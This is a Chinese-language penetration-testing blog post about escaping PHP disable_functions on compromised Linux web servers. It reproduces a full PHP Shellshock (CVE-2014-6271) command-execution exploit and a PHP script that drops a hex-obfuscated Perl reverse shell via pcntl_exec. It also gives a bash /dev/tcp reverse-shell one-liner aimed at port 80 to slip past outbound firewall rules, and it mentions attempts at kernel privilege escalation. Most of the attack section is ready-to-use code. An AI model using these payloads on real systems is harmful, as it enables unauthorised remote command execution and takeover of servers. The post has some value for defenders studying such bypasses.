滲透測試之繞過PHP的disable_functions
繼上篇文章之後,這次找了一臺linux的機器練習滲透測試。這次的話能寫入shell,但是無法執行任何命令,寫入一個 phpinfo 函式檢視詳情,發現 disable_functions 禁用了很多函式。具體如下:
可以看到 disable_functions 禁用了一下函式:
passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru
於是嘗試使用 ofollow,noindex"> CVE-2014-6271 ,但是沒有成功。後來發現該利用方法要求 PHP < 5.6.2 ,而本例中的PHP版本為 5.6.30 ,關於該CVE利用原理,大家可以參考 PHP Execute Command Bypass Disable_functions 這篇文章。這裡也順帶貼下指令碼,以備不時之需:
<?php # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: http://php.net # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror # Version: 5.* (tested on 5.6.2) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283 $tmp = tempnam(".","data"); putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); // In Safe Mode, the user may only alter environment variableswhose names // begin with the prefixes supplied by this directive. // By default, users will only be able to set environment variablesthat // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, // PHP will let the user modify ANY environment variable! mail("[email protected]","","","","-bv"); // -bv so we don't actuallysend any mail $output = @file_get_contents($tmp); @unlink($tmp); if($output != "") return $output; else return "No output, or not vuln."; } echo shellshock($_REQUEST["cmd"]); ?>
繼續通過google搜尋解決方法,發現了可以利用如果開啟了 pcntl 擴充套件,就可以利用 pcntl_exec 函式來執行命令,當然要想利用這種方法的話還是有些限制的( PHP 4 >= 4.2.0, PHP 5 on linux )。這裡直接貼出反彈shell的指令碼:
<?php /******************************* *檢視phpinfo編譯引數--enable-pcntl *作者 Spider *nc -vvlp 443 ********************************/ $ip = 'xxx.xxx.xxx.xxx'; $port = '443'; $file = '/tmp/bc.pl'; header("content-Type: text/html; charset=gb2312"); if(function_exists('pcntl_exec')) { $data = "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x20\x2d\x77\x0d\x0a\x23\x0d\x0a". "\x0d\x0a\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74\x3b\x20\x20\x20\x20\x0d\x0a\x75\x73\x65\x20". "\x53\x6f\x63\x6b\x65\x74\x3b\x0d\x0a\x75\x73\x65\x20\x49\x4f\x3a\x3a\x48\x61\x6e\x64\x6c\x65". "\x3b\x0d\x0a\x0d\x0a\x6d\x79\x20\x24\x72\x65\x6d\x6f\x74\x65\x5f\x69\x70\x20\x3d\x20\x27".$ip. "\x27\x3b\x0d\x0a\x6d\x79\x20\x24\x72\x65\x6d\x6f\x74\x65\x5f\x70\x6f\x72\x74\x20\x3d\x20\x27".$port. "\x27\x3b\x0d\x0a\x0d\x0a\x6d\x79\x20\x24\x70\x72\x6f\x74\x6f\x20\x3d\x20\x67\x65\x74\x70\x72". "\x6f\x74\x6f\x62\x79\x6e\x61\x6d\x65\x28\x22\x74\x63\x70\x22\x29\x3b\x0d\x0a\x6d\x79\x20\x24". "\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x20\x3d\x20\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69\x6e". "\x28\x24\x72\x65\x6d\x6f\x74\x65\x5f\x70\x6f\x72\x74\x2c\x20\x69\x6e\x65\x74\x5f\x61\x74\x6f". "\x6e\x28\x24\x72\x65\x6d\x6f\x74\x65\x5f\x69\x70\x29\x29\x3b\x0d\x0a\x6d\x79\x20\x24\x73\x68". "\x65\x6c\x6c\x20\x3d\x20\x27\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69\x27\x3b\x0d\x0a\x73\x6f". "\x63\x6b\x65\x74\x28\x53\x4f\x43\x4b\x2c\x20\x41\x46\x5f\x49\x4e\x45\x54\x2c\x20\x53\x4f\x43". "\x4b\x5f\x53\x54\x52\x45\x41\x4d\x2c\x20\x24\x70\x72\x6f\x74\x6f\x29\x3b\x0d\x0a\x53\x54\x44". "\x4f\x55\x54\x2d\x3e\x61\x75\x74\x6f\x66\x6c\x75\x73\x68\x28\x31\x29\x3b\x0d\x0a\x53\x4f\x43". "\x4b\x2d\x3e\x61\x75\x74\x6f\x66\x6c\x75\x73\x68\x28\x31\x29\x3b\x0d\x0a\x63\x6f\x6e\x6e\x65". "\x63\x74\x28\x53\x4f\x43\x4b\x2c\x24\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x29\x20\x6f\x72\x20". "\x64\x69\x65\x20\x22\x63\x61\x6e\x20\x6e\x6f\x74\x20\x63\x6f\x6e\x6e\x65\x63\x74\x3a\x24\x21". "\x22\x3b\x0d\x0a\x6f\x70\x65\x6e\x20\x53\x54\x44\x49\x4e\x2c\x20\x22\x3c\x26\x53\x4f\x43\x4b". "\x22\x3b\x0d\x0a\x6f\x70\x65\x6e\x20\x53\x54\x44\x4f\x55\x54\x2c\x20\x22\x3e\x26\x53\x4f\x43". "\x4b\x22\x3b\x0d\x0a\x6f\x70\x65\x6e\x20\x53\x54\x44\x45\x52\x52\x2c\x20\x22\x3e\x26\x53\x4f". "\x43\x4b\x22\x3b\x0d\x0a\x73\x79\x73\x74\x65\x6d\x28\x24\x73\x68\x65\x6c\x6c\x29\x3b\x0d\x0a". "\x63\x6c\x6f\x73\x65\x20\x53\x4f\x43\x4b\x3b\x0d\x0a\x65\x78\x69\x74\x20\x30\x3b\x0a"; $fp = fopen($file,'w'); $key = fputs($fp,$data); fclose($fp); if(!$key) exit('寫入'.$file.'失敗'); chmod($file,0777); pcntl_exec($file); unlink($file); } else { echo '不支援pcntl擴充套件'; } ?>
只要在本機上開啟 nc 偵聽埠,即可收到反彈回來的shell。
接下來就是提權了。先來看一下目標的核心版本,然後通過 searchsploit 來查詢可用的提權exp:
後來在目標機器上編譯失敗,報錯如下:
gcc pwn.c -o pwn gcc: error trying to exec 'cc1': execvp: No such file or directory
還沒來的及解決,管理員就將主機關閉了,測試也就到此結束。
後來又找了一臺類似的機器,核心版本一樣,但是這次沒有設定 disable_functions 仍是反彈不會來,猜測目標伺服器配置了流量出站規則,不允許內網機器向外連奇怪的埠。如果是這樣的話,我們連常用的埠即可。於是我在機器上用 nc 偵聽了80埠,用命令: /bin/bash -i > /dev/tcp/IP/80 0<&1 2>&1 ,隨機收到了反彈回來的shell。